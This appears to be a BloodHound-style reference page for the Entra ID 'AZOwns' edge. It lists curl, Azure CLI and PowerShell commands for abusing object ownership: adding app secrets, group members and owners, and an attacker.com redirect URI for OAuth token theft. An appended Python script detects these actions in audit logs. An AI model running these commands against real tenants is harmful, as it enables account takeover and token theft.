AZOwns

The source principal is an owner of the target Entra ID object, which grants nearly all abuse primitives against it.

Applies to: User / ServicePrincipal → AZGroup / AZServicePrincipal / AZDevice / AZApplication


Linux Abuse

Add secret to owned App Registration (curl)

# Authenticate as the owning principal (here a service principal, via client credentials)
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

# Add client secret to owned app
# <object-id> is the app registration's object ID, not its appId (client ID)
curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<object-id>/addPassword" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"passwordCredential": {"displayName": "backup"}}'

Add member to owned group (curl)

# $TOKEN from the step above; <object-id> is the principal being added to the group
curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Add member to owned group (Azure CLI)

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad group member add --group <target-group-id> --member-id <object-id>

Windows Abuse

Add secret to owned Service Principal (BARK)

$Token = Get-MSGraphTokenWithClientCredentials `
  -ClientID "<app-id>" -ClientSecret "<secret>" -TenantName "<tenant-id>"

New-EntraAppSecret `
  -AppRegObjectID "<object-id>" `
  -Token $Token.access_token

Add owner to owned SP (BARK)

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<target-sp-object-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $Token.access_token

Add member to owned group (Microsoft.Graph PS)

# Microsoft.Graph SDK 2.x expects -AccessToken as a SecureString
Connect-MgGraph -AccessToken (ConvertTo-SecureString "<access-token>" -AsPlainText -Force)
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Add owner to owned group

New-MgGroupOwner -GroupId <target-group-id> -DirectoryObjectId <object-id>

Update owned app redirect URIs (for OAuth token theft)

Update-MgApplication -ApplicationId <object-id> `
  -Web @{RedirectUris = @("https://attacker.com/callback")}

Opsec

  • Ownership grants near-arbitrary control; Azure logs each abuse action separately.
  • Adding secrets to apps leaves an audit event: "Update application - Certificates and secrets management."
  • Group membership changes log actor, target group, and added principal with timestamp.
  • Prefer adding a new secret over modifying existing credentials to avoid breaking the app.
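The Opsec bullets above name the audit events each of these actions leaves behind. The following detection script is an added example (not part of the original page, and not BloodHound or BARK code) that flags those events in an export of Entra ID directory audit records. It assumes the records follow the shape of Microsoft Graph `directoryAudit` objects (`activityDisplayName`, `initiatedBy`, `targetResources[].modifiedProperties`); the sample records are constructed, the activity names other than the one quoted in the Opsec section are assumed, and the `AppAddress` property name used for redirect URI changes is an assumption to verify against your own tenant's logs.

```python
"""Flag Entra ID audit events matching the owner-abuse actions on this page.

Added example, not from the original page. Record shape follows Microsoft Graph
directoryAudit objects; all sample data below is constructed.
"""
import json

# activityDisplayName -> alert rule. The first name is the one quoted in the
# Opsec section; the remaining names are assumed and should be checked against
# real audit output before being relied on.
WATCHED_ACTIVITIES = {
    "Update application - Certificates and secrets management": "app_credential_added",
    "Add member to group": "group_member_added",
    "Add owner to group": "group_owner_added",
    "Add owner to service principal": "sp_owner_added",
}
# modifiedProperties entry assumed to carry redirect URIs on "Update application" events
REDIRECT_PROPERTY = "AppAddress"

# Constructed sample export: a secret added to an app, a group membership
# change made by a service principal, a redirect URI added, and one benign event.
SAMPLE_AUDIT_LOG = json.dumps([
    {"activityDateTime": "2024-05-01T10:00:00Z",
     "activityDisplayName": "Update application \u2013 Certificates and secrets management",
     "category": "ApplicationManagement",
     "initiatedBy": {"user": {"userPrincipalName": "alice@example.com"}, "app": None},
     "targetResources": [{"type": "Application", "displayName": "payroll-sync",
                          "id": "11111111-1111-1111-1111-111111111111", "modifiedProperties": []}]},
    {"activityDateTime": "2024-05-01T10:02:00Z",
     "activityDisplayName": "Add member to group",
     "category": "GroupManagement",
     "initiatedBy": {"user": None, "app": {"displayName": "automation-sp"}},
     "targetResources": [
         {"type": "User", "displayName": "bob@example.com",
          "id": "22222222-2222-2222-2222-222222222222", "modifiedProperties": []},
         {"type": "Group", "displayName": "Finance Admins",
          "id": "33333333-3333-3333-3333-333333333333", "modifiedProperties": []}]},
    {"activityDateTime": "2024-05-01T10:05:00Z",
     "activityDisplayName": "Update application",
     "category": "ApplicationManagement",
     "initiatedBy": {"user": {"userPrincipalName": "alice@example.com"}, "app": None},
     "targetResources": [{"type": "Application", "displayName": "payroll-sync",
                          "id": "11111111-1111-1111-1111-111111111111",
                          "modifiedProperties": [{
                              "displayName": "AppAddress",
                              "oldValue": json.dumps([{"Address": "https://app.example.com/cb", "AddressType": "Reply"}]),
                              "newValue": json.dumps([{"Address": "https://app.example.com/cb", "AddressType": "Reply"},
                                                      {"Address": "https://example.net/callback", "AddressType": "Reply"}])}]}]},
    {"activityDateTime": "2024-05-01T10:07:00Z",
     "activityDisplayName": "Update user",
     "category": "UserManagement",
     "initiatedBy": {"user": {"userPrincipalName": "alice@example.com"}, "app": None},
     "targetResources": [{"type": "User", "displayName": "carol@example.com",
                          "id": "44444444-4444-4444-4444-444444444444", "modifiedProperties": []}]},
])


def _normalise(name):
    """Fold en/em dashes to '-' so the activity name matches however it was exported."""
    return name.replace("\u2013", "-").replace("\u2014", "-").strip()


def _actor(record):
    """Actor is either a user (UPN) or an application (service principal)."""
    by = record.get("initiatedBy") or {}
    user = by.get("user") or {}
    app = by.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"


def _redirect_uris(value):
    """Parse the JSON-encoded AppAddress list into a set of addresses."""
    if not value:
        return set()
    return {entry.get("Address") for entry in json.loads(value)}


def detect_ownership_abuse(records):
    """Return one alert dict per audit record matching an owner-abuse action."""
    alerts = []
    for rec in records:
        activity = _normalise(rec.get("activityDisplayName", ""))
        targets = rec.get("targetResources") or []
        base = {"time": rec.get("activityDateTime"), "actor": _actor(rec),
                "targets": [f"{t.get('type')}:{t.get('displayName')}" for t in targets]}
        rule = WATCHED_ACTIVITIES.get(activity)
        if rule:
            alerts.append({"rule": rule, **base})
            continue
        if activity == "Update application":
            # Only flag generic app updates that add a redirect URI.
            for tgt in targets:
                for prop in tgt.get("modifiedProperties") or []:
                    if prop.get("displayName") != REDIRECT_PROPERTY:
                        continue
                    added = sorted(_redirect_uris(prop.get("newValue")) - _redirect_uris(prop.get("oldValue")))
                    if added:
                        alerts.append({"rule": "app_redirect_uri_added", "added_uris": added, **base})
    return alerts


def load_sample():
    return json.loads(SAMPLE_AUDIT_LOG)


if __name__ == "__main__":
    for alert in detect_ownership_abuse(load_sample()):
        print(json.dumps(alert))
```

Feed it the JSON returned by the `auditLogs/directoryAudits` Graph endpoint or an exported audit log; the benign "Update user" record produces no alert, while the secret addition, the group membership change and the redirect URI addition each produce one, with the actor and affected objects that the Opsec section says are logged.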